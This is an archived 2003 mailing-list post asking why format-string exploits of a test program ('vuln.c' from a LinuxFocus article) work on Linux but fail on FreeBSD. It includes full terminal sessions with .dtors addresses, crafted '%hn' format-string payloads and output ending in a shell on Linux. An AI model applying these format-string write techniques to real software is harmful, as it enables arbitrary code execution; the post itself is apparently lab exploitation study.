hi folks, i got a question to formatstring attacks and the diff between linux and *BSD stack. I can manage to exploit some vuln progs on linux, but every attempt to exploit the same on FreeBSD for example fails. The only thing i could imagin is, that the stack behaviour is somewhat diff, so that for example the build*.c from http://www.linuxfocus.org/English/July2001/article191.shtml would produce fmts that are not compliant to fbsd... anyone a guess where the diff in exploiting fmt is? Or some good url/doc regarding specifics on *BSD & fmt attacks? First here my doing on linux (using the vuln.c from the link above): -------------------------------linux------------------------------- admin@linux:~> objdump -s -j .dtors vuln vuln: file format elf32-i386 Contents of section .dtors: 8049a64 ffffffff 00000000 ........ admin@linux:~> ./bui2 8049a68 8 Calling ./bui2 ... adr : 134519400 (8049a68) val : -1073744136 (bffff6f8) valh: 49151 (bfff) vall: 63224 (f6f8) [%.49143x%8$hn%.14073x%9$hn] (34) Calling ./vuln ... sc = 0xbffff8be adr : 134519400 (8049a68) val : -1073743682 (bffff8be) valh: 49151 (bfff) vall: 63678 (f8be) [%.49143x%8$hn%.14527x%9$hn] (34) 0 0xbffff894 1 0xbffff89b 2 0xbffff8be 3 0xbffff8ec 4 0xbffff8f4 helloWorld() = 0x8048770 accessForbidden() = 0x80487b0 before : ptrf() = 0x8048770 (0xbffff5fc) buffer = [00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000] (127) after : ptrf() = 0x8048770 (0xbffff5fc) Welcome in "helloWorld" sh-2.05$ -------------------------------linux------------------------------- Works quite fine ;) Now, i changed the shellcode of build2 to fbsd shellcode and tried to exploit it: -------------------------------freebsd------------------------------- > objdump -s -j .dtors vuln vuln: file format elf32-i386 Contents of section .dtors: 8049958 ffffffff 00000000 ........ > ./bui2 804995c 8 Calling ./bui2 ... adr : 134519132 (804995c) val : -1077937316 (bfbffb5c) valh: 49087 (bfbf) vall: 64348 (fb5c) [%.-16457x%8$hn%.15261x%9$hn] (35) Calling ./vuln ... sc = 0xbfbffc9f adr : 134519132 (804995c) val : -1077936993 (bfbffc9f) valh: 49087 (bfbf) vall: 64671 (fc9f) [%.-16457x%8$hn%.15584x%9$hn] (35) 0 0xbfbffc74 1 0xbfbffc7b 2 0xbfbffc9f 3 0xbfbffce4 4 0xbfbffcec helloWorld() = 0x8048770 accessForbidden() = 0x80487a0 before : ptrf() = 0x8048770 (0xbfbffa74) buffer = [2805f000 ] (127) after : ptrf() = 0x8048770 (0xbfbffa74) Welcome in "helloWorld" Segmentation fault (core dumped) -------------------------------freebsd------------------------------- I can try what i want (change values, shellcode, padding) it never executes a shell... What i found out myself, is that some values to write with %n seem to trouble fbsd, for example i wanted to write my shellcode-addr to 0xbfbffa74 (addr of the pointer), on linux this works fine, on fbsd i get *strange* values after writing to 0xbfbffa74 > ./bui2 0xbfbffa74 8 Calling ./bui2 ... adr : -1077937548 (bfbffa74) val : -1077937320 (bfbffb58) valh: 49087 (bfbf) vall: 64344 (fb58) [vú¿¿tú¿¿%.-16457x%8$hn%.15257x%9$hn] (35) Calling ./vuln ... sc = 0xbfbffc9f adr : -1077937548 (bfbffa74) val : -1077936993 (bfbffc9f) valh: 49087 (bfbf) vall: 64671 (fc9f) [vú¿¿tú¿¿%.-16457x%8$hn%.15584x%9$hn] (35) 0 0xbfbffc74 1 0xbfbffc7b 2 0xbfbffc9f 3 0xbfbffce4 4 0xbfbffcef helloWorld() = 0x8048770 accessForbidden() = 0x80487a0 before : ptrf() = 0x8048770 (0xbfbffa74) buffer = [vú¿¿tú¿¿2805f000 ] (127) after : ptrf() = 0x40517d31 (0xbfbffa74) // 0x40517d31 !? THATS surely NOT my shellcode adress (it's sc = 0xbfbffc9f) Segmentation fault (core dumped) Anyone a clue? -- +++ GMX - Mail, Messaging & more http://www.gmx.net +++ Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
This archive was generated by hypermail 2b30 : Wed Jun 18 2003 - 10:23:55 PDT